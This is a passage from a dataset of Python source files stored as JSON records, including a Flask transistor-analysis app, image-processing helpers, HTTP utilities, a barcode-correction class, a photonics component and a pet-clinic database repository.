group_ngraph(df)\n VOL1, CURR1 = drainVoltage.columns, drainCurrent.columns\n VOL2, CURR2 = gateVoltage.columns, gateCurrent.columns\n\n new_columns = []\n for v1, c1, v2, c2 in zip(VOL1, CURR1, VOL2, CURR2):\n new_columns.append(c1)\n new_columns.append(v1)\n new_columns.append(c2)\n new_columns.append(v2)\n df2 = pd.concat([drainVoltage,\n drainCurrent,\n gateVoltage,\n gateCurrent], axis=1)\n\n df2 = df2[new_columns]\n\n return render_template('for-ngraph/for-ngraph.html',\n title=title,\n originalData=data,\n transformedData=df2.to_csv(\n index=False, sep='\\t'))\n\n except:\n # エラーなどでリダイレクトしたい場合はこんな感じで\n return redirect(url_for('for_ngraph'))\n\n\n# end for-ngraph page\n####################\n\n\n####################\n# linear-saturation page\n\n\n@app.route('/linear-saturation', methods=['GET', 'POST'])\ndef linear_saturation():\n return render_template('linear-saturation/linear-saturation.html',\n title='Linear and saturation')\n\n\n@app.route('/linear-saturation/transformed', methods=['GET', 'POST'])\ndef linear_saturation_transform():\n title = \"Data is transformed!\"\n try:\n data = request.form['textarea'] # データを取得\n NestedList = toNestedList(data)\n try:\n df = pd.DataFrame(NestedList[1:], columns=NestedList[0])\n except:\n NestedList.pop(0)\n df = pd.DataFrame(NestedList[1:], columns=NestedList[0])\n df2 = group_linear_saturation(df)\n\n return render_template('linear-saturation/linear-saturation.html',\n title=title,\n originalData=data,\n transformedData=df2.to_csv(\n index=False, sep='\\t'))\n\n except:\n # エラーなどでリダイレクトしたい場合はこんな感じで\n return redirect(url_for('linear_saturation'))\n\n\n# end linear-saturation page\n####################\n\n\n####################\n# curr-vol page\n\n\n@app.route('/current-voltage', methods=['GET', 'POST'])\ndef current_voltage():\n return render_template('current-voltage/current-voltage.html',\n title='Current-voltage')\n\n\n@app.route('/current-voltage/plotted', methods=['GET', 'POST'])\ndef current_voltage_plotted():\n mpl.rcParams['font.size'] = 24\n mpl.rcParams['xtick.labelsize'] = 'large'\n mpl.rcParams['ytick.labelsize'] = 'large'\n mpl.rcParams['axes.labelsize'] = 'x-large'\n mpl.rcParams['font.family'] = 'sans-serif'\n\n try:\n data = request.form['textarea'] # データを取得\n NestedList = toNestedList(data)\n while(True):\n if NestedList[-1] == ['']:\n NestedList.pop(-1)\n else:\n break\n\n try:\n df = pd.DataFrame(NestedList[1:],\n columns=NestedList[0])\n except:\n NestedList.pop(0)\n df = pd.DataFrame(NestedList[1:],\n columns=NestedList[0])\n drainVoltage, drainCurrent, gateVoltage, gateCurrent = group_ngraph(df)\n\n X = drainVoltage.values\n Y = drainCurrent.values\n\n colors = [\"#4C72B0\",\n \"#55A868\",\n \"#C44E52\",\n \"#8172B2\",\n \"#CCB974\",\n \"#64B5CD\"]*5\n\n fig, ax = plt.subplots(figsize=(8, 8))\n\n for i in range(gateVoltage.values.shape[1]):\n ax.plot(X[:, i],\n Y[:, i]*1e6,\n color=colors[i])\n\n plugins.connect(fig, plugins.MousePosition(fontsize=14))\n\n def form(string):\n return request.form[string]\n\n def IsNone(string):\n return form(string) is not ''\n\n if IsNone('xaxis-min') and IsNone('xaxis-max'):\n ax.set_xlim([float(form('xaxis-min')),\n float(form('xaxis-max'))])\n\n if IsNone('yaxis-min') and IsNone('yaxis-max'):\n ax.set_ylim([float(form('yaxis-min')),\n float(form('yaxis-max'))])\n\n ax.set_xlabel(\n 'Drain-source voltage (V)')\n ax.set_ylabel(\n 'Drain-source current (µA)')\n plt.tight_layout()\n\n mpld3.save_html(fig, 'static/images/I-V.html')\n return redirect('static/images/I-V.html')\n\n except:\n # エラーなどでリダイレクトしたい場合はこんな感じで\n return redirect(url_for('current_voltage'))\n\n# end curr-vol page\n####################\n\n\n####################\n# linear-mobility page\n\n\n@app.route('/linear-mobility', methods=['GET', 'POST'])\ndef linear_mobility():\n return render_template('linear-mobility/linear-mobility.html',\n title='Linear mobility')\n\n\n@app.route('/linear-mobility/calculated', methods=['GET', 'POST'])\ndef linear_mobility_calculated():\n title = \"Mobility is calculated!\"\n try:\n data = request.form['textarea']\n length = float(request.form['channel-length'])\n width = float(request.form['channel-width'])\n capacitance = float(request.form['capacitance']) # データを取得\n\n NestedList = toNestedList(data)\n try:\n df = pd.DataFrame(NestedList[1:], columns=NestedList[0])\n except:\n NestedList.pop(0)\n df = pd.DataFrame(NestedList[1:], columns=NestedList[0])\n\n drainVoltage, drainCurrent, gateVoltage, gateCurrent = group_ngraph(df)\n\n A = []\n B = []\n\n X = gateVoltage.values\n Y = drainCurrent.values\n\n for i in range(X.shape[0]):\n x = X[i, :]\n y = Y[i, :]\n param = np.polyfit(x, y, 1)\n A.append(param[0])\n B.append(param[1])\n\n A = np.array(A)\n B = np.array(B)\n\n mu = [linear_mu(length, a, width, capacitance, v)\n for a, v in zip(A, drainVoltage.values[:, 1])]\n\n threshold = [linear_threshold(length, b, width, m, capacitance, v)\n for b, m, v in zip(B, mu, drainVoltage.values[:, 1])]\n\n table = pd.DataFrame({'drain_vol [V]': drainVoltage.values[:, 1],\n 'a [micro A/V]': A*10**6,\n 'b [micro A]': B*10**6,\n 'mu [cm^2/Vs]': mu,\n 'Vth [V]': threshold},\n columns=['drain_vol [V]',\n 'a [micro A/V]',\n 'b [micro A]',\n 'mu [cm^2/Vs]',\n 'Vth [V]'])\n\n return render_template('linear-mobility/linear-mobility.html',\n title=title,\n originalData=data,\n channelLength=length,\n channelWidth=width,\n capacitance=capacitance,\n calculatedData=table.to_csv(\n index=False, sep='\\t'))\n\n except:\n # エラーなどでリダイレクトしたい場合はこんな感じで\n return redirect(url_for('linear_mobility'))\n\n# end linear-mobility page\n####################\n\n\n####################\n# saturation-mobility page\n\n\n@app.route('/saturation-mobility', methods=['GET', 'POST'])\ndef saturation_mobility():\n return render_template('saturation-mobility/saturation-mobility.html',\n title='Saturation mobility')\n\n\n@app.route('/saturation-mobility/calculated', methods=['GET', 'POST'])\ndef saturation_mobility_calculated():\n title = \"Mobility is calculated!\"\n try:\n data = request.form['textarea']\n length = float(request.form['channel-length'])\n width = float(request.form['channel-width'])\n capacitance = float(request.form['capacitance']) # データを取得\n\n NestedList = toNestedList(data)\n try:\n df = pd.DataFrame(NestedList[1:], columns=NestedList[0])\n except:\n NestedList.pop(0)\n df = pd.DataFrame(NestedList[1:], columns=NestedList[0])\n\n drainVoltage, drainCurrent, gateVoltage, gateCurrent = group_ngraph(df)\n\n A = []\n B = []\n C = []\n\n X = gateVoltage.values\n Y = drainCurrent.values\n\n for i in range(X.shape[0]):\n x = X[i, :]\n y = Y[i, :]\n param = np.polyfit(x, y, 2)\n A.append(param[0])\n B.append(param[1])\n C.append(param[2])\n\n A = np.array(A)\n B = np.array(B)\n C = np.array(C)\n\n mu = [saturation_mu(a, length, width, capacitance) for a in A]\n\n threshold = [saturation_threshold(b, length, width, m, capacitance)\n for b, m in zip(B, mu)]\n\n table = pd.DataFrame({'drain_vol [V]': drainVoltage.values[:, 1],\n 'a [x10^6]': A*10**6,\n 'b [x10^6]': B*10**6,\n 'c [x10^6]': C*10**6,\n 'mu [cm^2/Vs]': mu,\n 'Vth [V]': threshold},\n columns=['drain_vol [V]',\n 'a [x10^6]',\n 'b [x10^6]',\n 'c [x10^6]',\n 'mu [cm^2/Vs]',\n 'Vth [V]'])\n\n return render_template('saturation-mobility/saturation-mobility.html',\n title=title,\n originalData=data,\n channelLength=length,\n channelWidth=width,\n capacitance=capacitance,\n calculatedData=table.to_csv(\n index=False, sep='\\t'))\n\n except:\n # エラーなどでリダイレクトしたい場合はこんな感じで\n return redirect(url_for('linear_mobility'))\n\n# end saturation-mobility page\n####################\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"507001498","text":"from .improve import *\nfrom .loggingfunctions import *\nfrom logging import getLogger\nimport badgecheck\nimport util.state\n\nlogger = getLogger(__name__)\nspecial_badges = [17800, 15098, 15097, 15099]\nspecialMSG = \"{} is allowed to receive food regardless of meeting requirements.\"\n\n\ndef addResponseMessage(resp, message):\n\tif 'message' not in resp['result']:\n\t\tresp['result']['message'] = str(message)\n\telse:\n\t\tresp['result']['message'] += \" \" +str(message)\n\n\ndef specialBadgeCheck(resp):\n\tif resp['result']['badge_num'] in special_badges:\n\t\taddResponseMessage(\n\t\t\tresp,\n\t\t\tspecialMSG.format(resp['result']['name'])\n\t\t)\n","sub_path":"backend/util/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"589743294","text":"# Given an unsorted integer array, find the smallest missing positive integer.\n#\n# Example 1:\n#\n#\n# Input: [1,2,0]\n# Output: 3\n#\n#\n# Example 2:\n#\n#\n# Input: [3,4,-1,1]\n# Output: 2\n#\n#\n# Example 3:\n#\n#\n# Input: [7,8,9,11,12]\n# Output: 1\n#\n#\n# Note:\n#\n# Your algorithm should run in O(n) time and uses constant extra space.\n#\n\n\nclass Solution:\n def firstMissingPositive(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n n = len(nums)\n for i in range(n):\n while(0 < nums[i] <= n and nums[nums[i]-1] != nums[i]):\n ind = nums[i] - 1\n nums[i], nums[ind] = nums[ind], nums[i]\n print(nums)\n for i in range(n):\n if i != nums[i] - 1: # First wrong position\n return i + 1 \n \n return n + 1\n","sub_path":"041-first-missing-positive/first-missing-positive.py","file_name":"first-missing-positive.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"491388848","text":"import urllib.parse, urllib.request, requests, json\n\ndef get(url, args, headers={}):\n if args and len(args) != 0:\n url = url + '?' + urllib.parse.urlencode(args)\n\n # If you do not pass the data argument, urllib uses a GET request.\n req = urllib.request.Request(url, None, headers)\n response = urllib.request.urlopen(req)\n\n return response\n\ndef post(url, query_args={}, headers={}, type='form'):\n if type == 'json':\n data = json.dumps(query_args).encode('utf-8')\n headers['Content-Type'] = 'application/json'\n else:\n data = urllib.parse.urlencode(query_args).encode('utf-8')\n\n req = urllib.request.Request(url, data, headers)\n response = urllib.request.urlopen(req)\n # print(response.read())\n\n return response\n\ndef post_file(url, content, parameter_name, file_name, headers={}):\n files = {parameter_name: (file_name, content)}\n return requests.post(url, data={}, files=files, headers=headers)\n\ndef get_client_ip(http_x_forwarded_for, remote_addr):\n x_forwarded_for = http_x_forwarded_for\n if x_forwarded_for:\n ip = x_forwarded_for.split(',')[0]\n else:\n ip = remote_addr\n return ip\n\ndef load_image_binary(url):\n response = get(url, {}, {\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',\n 'Accept-Encoding': 'none',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'Connection': 'keep-alive'\n })\n # https://stackoverflow.com/questions/1308584/is-it-possible-to-peek-at-the-data-in-a-urllib2-response\n # response.read = lambda: picBinary\n return response\n","sub_path":"skyvarietyutils/http_client.py","file_name":"http_client.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"207997833","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 28 16:39:39 2018\n\n@author: Manuel Andres Sanchez Muñoz\n\nFunciones\n\n\"\"\"\nimport numpy as np\nimport scipy.signal as sg\nimport math\n\ndef my_gamma(image,gamma):\n Im_ga = np.double(image)\n Im2 = Im_ga**gamma #gamma image\n Im2 = np.uint8(255*Im2/Im2.max())\n return Im2\n\ndef grayWhite(image, A, B):\n imageArray = np.array(image)\n zeroArray = np.zeros(imageArray.shape)\n zeroArray[(imageArray>=A)&(imageArray<=B)] = 255\n returnImage = np.uint8(zeroArray) \n return returnImage\n\ndef grayBlack(image, A, B):\n imageArray = np.array(image)\n imageArray[(imageArray>=A)&(imageArray<=B)] = 255 \n returnImage = np.uint8(imageArray) \n return returnImage\n\ndef my_hist(im):\n [row, col] = im.shape;\n vec = np.zeros(256)\n print(vec.shape)\n for i in range(0,row-1):\n for j in range(0,col-1):\n valor = im[i,j] \n vec[valor] = vec[valor] + 1\n return vec\n\ndef my_equal(im,h):\n [row, col] = im.shape;\n n = row*col\n p = h/n\n s = np.cumsum(p)\n k = s*255\n im2=im\n for i in range(0,row-1):\n for j in range(0,col-1):\n valor = im[i,j] \n im2[i,j]=k[valor]\n return im2\n\ndef rgb2ycbcr(im):\n xform = np.array([[.299, .587, .114], [-.169, -.331, .5], [.5, -.419, -.081]])\n ycbcr = im.dot(xform.T)\n ycbcr[:,:,[1,2]] += 128\n return np.double(ycbcr)\n\ndef ycbcr2rgb(im):\n xform = np.array([[1, 0, 1.403], [1, -0.344, -.714], [1, 1.773, 0]])\n rgb = im.astype(np.float)\n rgb[:,:,[1,2]] -= 128\n rgb = rgb.dot(xform.T)\n np.putmask(rgb, rgb > 255, 255)\n np.putmask(rgb, rgb < 0, 0)\n return np.uint8(rgb)\n\ndef my_linealTrozos(image,a,p1,p2):\n Im_lt = np.double(image)\n Im_s = np.zeros(Im_lt.shape)\n Im_s[Im_lt<=p1[0]]=a[0]*Im_lt[Im_lt<=p1[0]]\n Im_s[(Im_lt>p1[0])&(Im_lt<=p2[0])]=a[1]*(Im_lt[(Im_lt>p1[0])&(Im_lt<=p2[0])]-p1[0])+p1[1]\n Im_s[Im_lt>p2[0]]=a[2]*(Im_lt[Im_lt>p2[0]]-p2[0])+p2[1]\n Imf = np.uint8(Im_s)\n return Imf\n\ndef logarithm(image):\n imageDouble = np.double(np.array(image))\n imageReturn = np.log(1+imageDouble)\n imageReturn = np.uint8(255*imageReturn/imageReturn.max())\n return imageReturn\n\ndef negative(image):\n imageReturn = np.array(image)\n imageSend = 255 - imageReturn\n return imageSend\n\n# Funciones para parcial 2\n\ndef my_mse(image1,image2):\n [n,l] = image1.shape\n n = n * l\n mse = sum(sum((image1-image2)**2))/n\n return mse\n\ndef my_medianfilter(im):\n [row,col]=im.shape\n imf = np.zeros((row+2,col+2))\n i_median = np.zeros((row,col))\n imf[1:row+1,1:col+1] = im\n for i in range (1,row):\n for j in range (1,col):\n temp = imf[i-1:i+1:,j-1:j+1]\n out = np.median(temp)\n i_median[i-1,j-1] = out\n return i_median\n\ndef my_gradient(im):\n mask_dx = np.array([(-1,-2,-1),(0,0,0),(1,2,1)])\n mask_dy = np.array([(-1,0,1),(-2,0,2),(-1,0,1)])\n Im_dx = sg.convolve2d(im,mask_dx)\n Im_dy = sg.convolve2d(im,mask_dy)\n Im_grad = np.abs(Im_dx)+np.abs(Im_dy)\n return (Im_grad, Im_dy, Im_dx)\n\ndef my_laplace_4_vecinos(im):\n mask_dx = np.array([(0,-1,0),(-1,5,-1),(0,-1,0)])\n Im_dx = sg.convolve2d(im,mask_dx)\n imageReturn = np.uint8(255*Im_dx/Im_dx.max())\n return (imageReturn)\n\ndef my_laplace_8_vecinos(im):\n mask_dx = np.array([(-1,-1,-1),(-1,9,-1),(-1,-1,-1)])\n Im_dx = sg.convolve2d(im,mask_dx)\n imageReturn = np.uint8(255*Im_dx/Im_dx.max())\n return (imageReturn)\n\ndef my_rgb2cmy(im):\n CMY = 255-im\n return CMY\n\ndef my_cmy2rgb(im):\n RGB = 255-im\n return RGB\n\ndef my_mseRGB(image1,image2):\n [m,n,b]=image1.shape\n N = m*n*b\n mse = sum(sum(sum((image1-image2)**2)))/N\n return mse\n\ndef my_threshold(image, umbral):\n Image_lt = np.double(image)\n Image_zero = np.zeros(Image_lt.shape)\n Image_zero[(Image_lt>=umbral)]=1\n imageResponse = np.uint8(Image_zero)\n return imageResponse \n\ndef rgb2hsi(r,g,b):\n numerador = (((r - g) + (r - b)) * 0.5)\n denominador = ((((r - g)*(r - g)) + ((r - b) * (g - b)))**0.5)\n \n if (denominador == 0):\n denominador = 0.000001\n \n theta = np.arccos(numerador/denominador)\n \n if(b<=g):\n h = theta\n if(b>g):\n h = (2*np.degrees(math.pi)) - theta\n \n s = 1 - ((3*min(r,g,b))/float(r + b + g))\n \n if (s==0):\n h=0\n \n i = float(r + g + b)/3\n return (h, s, i)\n\ndef hsi2rgb (H,S,I):\n r=0\n g=0\n b=0\n \n if (H>=0 and H<((2*np.degrees(math.pi))/3)):\n b = I*(1-S)\n den = np.cos((math.pi/3)-H)\n \n if (den == 0):\n den=0.000001\n \n r = I*(1+((S*np.cos(H))/den))\n g = (3*I)-(r+b)\n \n if (H>=((2*np.degrees(math.pi))/3) and H<(4*((np.degrees(math.pi))/3))):\n r = I*(1-S)\n den = (np.cos(((math.pi)/3)-(H-((math.pi)/3))))\n \n if (den == 0):\n den=0.000001\n \n g = I*(1+((S*np.cos(H-(math.pi/3))))/den)\n b = (3*I)-(r+g)\n \n if (H>=(4*((np.degrees(math.pi))/3)) and H<(2*np.degrees(math.pi))):\n g = I*(1-S)\n den = (np.cos(((math.pi)/3)-(H-(4*((math.pi)/3)))))\n \n if (den == 0):\n den=0.000001\n \n b = I*(1+((S*np.cos(H-(4*((math.pi)/3))))/den))\n r = (3*I)-(g+b)\n \n return (r,g,b)\n \n \n \n \n\n \n \n \n \n \n \n \n \n\n\n\n","sub_path":"paraParcial2/funciones.py","file_name":"funciones.py","file_ext":"py","file_size_in_byte":5490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"233194968","text":"import editdistance\nfrom tqdm import tqdm\nfrom typing import Optional, Dict\nimport nmslib\nimport pandas as pd\n\n\nclass SeqCorrect:\n def __init__(\n self,\n min_counts: int = 20,\n max_dist: int = 3,\n ann_k: Optional[int] = None,\n ann_m: int = 30,\n ann_ef_construction: int = 100,\n ann_post: int = 0,\n n_threads: int = 2,\n ann_ef_search: int = 100,\n disable_progress_bar: bool = False,\n ):\n \"\"\"\n Class for identifying erroneous barcodes and merging their frequency with their correct version.\n\n :param min_counts: Minimum barcode frequency threshold. Barcodes with less than this value are removed. This\n check is performed on corrected counts.\n :param max_dist: Minimum distance threshold when comparing barcodes. Barcodes with less than this value is\n considered to be an erroneous version of a higher abundance barcode.\n :param ann_k: Number of neighbours in the KNN search.\n :param ann_m: ANN index construction parameter M\n :param ann_ef_construction: ANN index construction EF\n :param ann_post: ANN index construction post\n :param n_threads: ANN number of threads\n :param ann_ef_search: ANN query parameter EF\n :param disable_progress_bar: If True, then progress bars are not shown\n \"\"\"\n\n if ann_k is None:\n self.annK = 2 * ann_m # Same as the default behaviour of nmslib\n else:\n self.annK = ann_k\n self.minCounts = min_counts\n self.maxDist = max_dist\n self.indexParams = {\n \"M\": ann_m,\n \"efConstruction\": ann_ef_construction,\n \"post\": ann_post,\n \"indexThreadQty\": n_threads,\n }\n self.queryParams = {\"efSearch\": ann_ef_search}\n self.index = None\n self.correctedCounts: Optional[pd.Series] = None\n self.disablePb = disable_progress_bar\n\n def _build_index(self, raw_counts: Dict[str, int]) -> None:\n index = nmslib.init(\n method=\"hnsw\",\n space=\"leven\",\n data_type=nmslib.DataType.OBJECT_AS_STRING,\n dtype=nmslib.DistType.INT,\n )\n index.addDataPointBatch(list(raw_counts.keys()))\n index.createIndex(self.indexParams, print_progress=True)\n self.index = index\n\n def _query_index(self, raw_counts: Dict[str, int]) -> Dict[str, str]:\n bc_list = list(raw_counts.keys())\n self.index.setQueryTimeParams(self.queryParams)\n nbrs = self.index.knnQueryBatch(\n bc_list, k=self.annK, num_threads=self.indexParams[\"indexThreadQty\"]\n )\n nm = {}\n for n, i in tqdm(\n enumerate(nbrs),\n total=len(nbrs),\n desc=\"Querying ANN index\",\n disable=self.disablePb,\n ):\n a = bc_list[n]\n for j in i[0]:\n b = bc_list[j]\n if j == n:\n continue\n if raw_counts[a] > raw_counts[b]:\n continue\n d = editdistance.eval(a, b)\n if d > self.maxDist:\n break\n if a in nm:\n if raw_counts[b] > raw_counts[nm[a]]:\n nm[a] = b\n else:\n nm[a] = b\n return nm\n\n def _correct(\n self, raw_counts: Dict[str, int], neighbors: Dict[str, str]\n ) -> Dict[str, int]:\n bc_list = list(raw_counts.keys())\n cor_counts = {}\n for i in tqdm(bc_list, desc=\"Merging barcodes\", disable=self.disablePb):\n if i in neighbors:\n a = neighbors[i]\n else:\n a = i\n if a not in cor_counts:\n cor_counts[a] = 0\n cor_counts[a] += raw_counts[i]\n\n clean_counts = {}\n for i in tqdm(\n cor_counts, desc=\"Filtering corrected barcodes\", disable=self.disablePb\n ):\n if raw_counts[i] <= cor_counts[i] and cor_counts[i] > self.minCounts:\n clean_counts[i] = cor_counts[i]\n return clean_counts\n\n def run(self, raw_counts: pd.Series) -> None:\n \"\"\"\n Get corrected and filtered barcodes.\n\n :param raw_counts: Row barcodes counts, in form of a dictionary.\n :return: Corrected barcode counts in form of a dictionary\n \"\"\"\n counts = dict(raw_counts.to_dict())\n self._build_index(counts)\n neighbors = self._query_index(counts)\n self.correctedCounts = pd.Series(self._correct(counts, neighbors))\n\n def save_to_csv(self, file_name: str):\n \"\"\"\n\n :param file_name:\n :return:\n \"\"\"\n self.correctedCounts.to_csv(file_name, header=False)\n","sub_path":"bartide/sequence_corrector.py","file_name":"sequence_corrector.py","file_ext":"py","file_size_in_byte":4804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"97326866","text":"#!/usr/bin/env python3\n\"\"\"\nClass defines a single neuron performing binary classification\n\"\"\"\nimport numpy as np\n\n\nclass DeepNeuralNetwork:\n \"\"\" class neuron\"\"\"\n def __init__(self, nx, layers):\n \"\"\" initialize \"\"\"\n # nx is the number of input features\n if not isinstance(nx, int):\n raise TypeError(\"nx must be an integer\")\n elif nx < 1:\n raise ValueError(\"nx must be a positive integer\")\n\n # is the number of layers found in the hidden layer\n if not isinstance(layers, int):\n raise TypeError(\"layers must be an integer\")\n elif layers < 1:\n raise ValueError(\"layers must be a positive integer\")\n","sub_path":"supervised_learning/0x00-binary_classification/19-deep_neural_network.py","file_name":"19-deep_neural_network.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"266711342","text":"import gdsfactory as gf\nfrom gdsfactory.add_padding import get_padding_points\nfrom gdsfactory.component import Component\nfrom gdsfactory.cross_section import strip\nfrom gdsfactory.path import arc, extrude\nfrom gdsfactory.snap import snap_to_grid\nfrom gdsfactory.types import CrossSectionFactory\n\n\n@gf.cell\ndef bend_circular(\n angle: int = 90,\n npoints: int = 720,\n with_cladding_box: bool = True,\n cross_section: CrossSectionFactory = strip,\n **kwargs\n) -> Component:\n \"\"\"Returns a radial arc.\n\n Args:\n angle: angle of arc (degrees)\n npoints: number of points\n with_cladding_box: square in layers_cladding to remove DRC\n cross_section:\n **kwargs: cross_section settings\n\n .. plot::\n :include-source:\n\n import gdsfactory as gf\n\n c = gf.components.bend_circular(radius=10, angle=90, npoints=720)\n c.plot()\n\n \"\"\"\n x = cross_section(**kwargs)\n radius = x.info[\"radius\"]\n\n p = arc(radius=radius, angle=angle, npoints=npoints)\n c = extrude(p, x)\n\n c.length = snap_to_grid(p.length())\n c.dy = abs(p.points[0][0] - p.points[-1][0])\n c.radius_min = radius\n\n if with_cladding_box and x.info[\"layers_cladding\"]:\n layers_cladding = x.info[\"layers_cladding\"]\n cladding_offset = x.info[\"cladding_offset\"]\n top = cladding_offset if angle == 180 else 0\n points = get_padding_points(\n component=c,\n default=0,\n bottom=cladding_offset,\n right=cladding_offset,\n top=top,\n )\n for layer in layers_cladding or []:\n c.add_polygon(points, layer=layer)\n return c\n\n\n@gf.cell\ndef bend_circular180(angle: int = 180, **kwargs) -> Component:\n \"\"\"Returns a 180 degrees radial arc.\n\n Args:\n angle: angle of arc (degrees)\n npoints: number of points\n with_cladding_box: square in layers_cladding to remove DRC\n waveguide: from tech.waveguide\n kwargs: cross_section_factory settings\n\n \"\"\"\n return bend_circular(angle=angle, **kwargs)\n\n\nif __name__ == \"__main__\":\n from pprint import pprint\n\n # c = bend_circular(width=2, layer=gf.LAYER.M1)\n c = bend_circular()\n c.show()\n pprint(c.get_settings())\n\n # c = bend_circular180()\n # c.plotqt()\n\n # from phidl.quickplotter import quickplot2\n # c = bend_circular_trenches()\n # c = bend_circular_deep_rib()\n # print(c.ports)\n # print(c.length, np.pi * 10)\n # print(c.ports.keys())\n # print(c.ports['o2'].midpoint)\n # print(c.settings)\n # c = bend_circular_slot()\n # c = bend_circular(width=0.45, radius=5)\n # c.plot()\n # quickplot2(c)\n","sub_path":"gdsfactory/components/bend_circular.py","file_name":"bend_circular.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"561211483","text":"# Import required modules\nfrom database.run_sql import run_sql\nfrom models.pet import Pet\nfrom models.owner import Owner\nfrom models.pet_type import PetType\nfrom models.vet import Vet\nimport repositories.pet_type_repository as PTR\nimport repositories.owner_repository as OR\nimport repositories.vet_repository as VR\n\n# CRUD FUNCTIONS\n\n# FUNCTION: save(item)\n# This function is used to save a pet to the database\ndef save(pet):\n # Create the SQL query && input data before running it\n sql = \"INSERT INTO pet (name, dob, owner_id, type_id, vet_id) VALUES (%s, %s, %s, %s, %s) RETURNING id\"\n values = [pet.name, pet.dob, pet.owner.id, pet.pet_type.id, pet.vet.id]\n result = run_sql(sql, values)\n\n # Set the pet objects ID to the ID generated by the database\n if len(result) > 0:\n id = result[0]['id']\n pet.id = id\n\n return pet\n\n# FUNCTION: select_all()\n# This function is used to select all of the pets from the database and create python objects\n# using the data so they can be displayed\ndef select_all():\n # Create list of pet objects and set == empty list\n pets = []\n\n # Create the SQL query && input data before running it\n sql = \"SELECT * FROM pet\"\n results = run_sql(sql)\n\n # Loop through all the results and append the objects to a list\n for row in results:\n # Get the objects to create the pet object\n pet_type = PTR.select(row['type_id'])\n owner = OR.select(row['owner_id'])\n vet = VR.select(row['vet_id'])\n\n # Create new pet object && append to pets list\n new_pet = Pet(row['name'], row['dob'], owner, pet_type, vet, row['id'])\n pets.append(new_pet)\n\n return pets\n\n# FUNCTION: select(item_id)\n# This function is used to select a specific pet by its ID in the database to be able to create an object\n# that can be displayed\ndef select(pet_id):\n # Create the SQL query, pass in the data and run it\n sql = \"SELECT * FROM pet WHERE id = %s\"\n values = [pet_id]\n result = run_sql(sql, values)\n\n # Create object if data is found in the database\n if len(result) > 0:\n pet_type = PTR.select(result[0]['type_id'])\n owner = OR.select(result[0]['owner_id'])\n vet = VR.select(result[0]['vet_id'])\n new_pet = Pet(result[0]['name'], result[0]['dob'], owner, pet_type, vet, result[0]['id'])\n \n return new_pet\n\n# FUNCTION: delete(item_id)\n# This function is used to delete a specific item from the database using its id\ndef delete(pet_id):\n # Create the SQL query, pass in the data and run it\n sql = \"DELETE FROM pet WHERE id = %s\"\n values = [pet_id]\n run_sql(sql, values)\n\n# FUNCTION: delete_all()\n# This function is used to delete all data from the table that coresponds to the class it is run from\ndef delete_all():\n # Create SQL query and run it\n sql = \"DELETE FROM pet\"\n run_sql(sql)\n\n# FUNCTION: update(item_id)\n# This function is used to update data within the database\ndef update(pet):\n # Create SQL query, pass in the data and run it\n sql = \"UPDATE pet SET (name, dob, owner_id, type_id, vet_id) = (%s, %s, %s, %s, %s) WHERE id = %s\"\n values = [pet.name, pet.dob, pet.owner.id, pet.pet_type.id, pet.vet.id, pet.id]\n run_sql(sql, values)\n\n# FUNCTION: select_by_owner(item_id)\n# This function is used to select all pets by an owner id\ndef select_by_owner(owner_id):\n # Create list of pets == empty list\n pets = []\n\n # Create SQL query, input data && run\n sql = \"SELECT * FROM pet WHERE owner_id = %s\"\n values = [owner_id]\n results = run_sql(sql, values)\n\n # Loop through the results\n for row in results:\n # Get the objects to create the pet object\n pet_type = PTR.select(row['type_id'])\n owner = OR.select(row['owner_id'])\n vet = VR.select(row['vet_id'])\n\n # Create new pet object && append to pets list\n new_pet = Pet(row['name'], row['dob'], owner, pet_type, vet, row['id'])\n pets.append(new_pet)\n\n return pets\n\n# FUNCTION: select_by_vet(item_id)\n# This function is used to select all pets by the vet id\ndef select_by_vet(vet_id):\n # Create list of pets == empty list\n pets = []\n\n # Create SQL query, input data && run\n sql = \"SELECT * FROM pet WHERE vet_id = %s\"\n values = [vet_id]\n results = run_sql(sql, values)\n\n # Loop through the results\n for row in results:\n # Get the objects to create the pet object\n pet_type = PTR.select(row['type_id'])\n owner = OR.select(row['owner_id'])\n vet = VR.select(row['vet_id'])\n\n # Create new pet object && append to pets list\n new_pet = Pet(row['name'], row['dob'], owner, pet_type, vet, row['id'])\n pets.append(new_pet)\n\n return pets","sub_path":"app/repositories/pet_repository.py","file_name":"pet_repository.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"384703344","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nx = np.linspace(-np.pi, np.pi, 256, endpoint = True)\nC, S = np.cos(x), np.sin(x)\n\n\n\n\n\n\nplt.figure(figsize = (8,6), dpi = 100)\nplt.subplot(111)\nx = np.linspace(-np.pi, np.pi, 256, endpoint = True)\nC, S = np.cos(x), np.sin(x)\nplt.plot(x, C, color = 'blue', linewidth = 2.0, linestyle = '-', label = 'cosine')\nplt.plot(x, S, color = 'red', linewidth = 